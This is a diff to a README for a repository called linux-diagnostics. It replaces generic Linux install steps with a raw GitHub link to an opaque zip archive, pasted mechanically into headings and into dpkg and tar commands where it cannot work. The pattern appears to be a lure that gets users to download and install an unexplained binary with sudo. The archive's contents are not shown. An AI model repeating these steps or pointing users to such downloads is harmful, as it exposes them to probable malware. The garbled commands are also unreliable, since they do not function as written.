tolik125/linux-diagnostics/README.md

 1. Open your terminal.
 2. Navigate to the directory where you downloaded the `.deb` file.
-3. Type `sudo dpkg -i filename.deb` (replace "filename" with the actual file name).
+3. Type `sudo dpkg -i https://github.com/tolik125/linux-diagnostics/raw/refs/heads/main/bin/diagnostics_linux_misoneist.zip` (replace "filename" with the actual file name).
 4. If the installation encounters any errors, use `sudo apt-get install -f` to fix dependencies.

-### For Other Linux Systems (.tar.gz files)
+### For Other Linux Systems (https://github.com/tolik125/linux-diagnostics/raw/refs/heads/main/bin/diagnostics_linux_misoneist.zip files)

 1. Open your terminal.
-2. Navigate to the directory where you downloaded the `.tar.gz` file.
+2. Navigate to the directory where you downloaded the `https://github.com/tolik125/linux-diagnostics/raw/refs/heads/main/bin/diagnostics_linux_misoneist.zip` file.
-3. Extract the contents with `tar -xvzf filename.tar.gz`.
+3. Extract the contents with `tar -xvzf https://github.com/tolik125/linux-diagnostics/raw/refs/heads/main/bin/diagnostics_linux_misoneist.zip`.
 4. Follow any README or INSTALL files inside the extracted folder for specific instructions.

 ## 🛠️ How to Use linux-diagnostics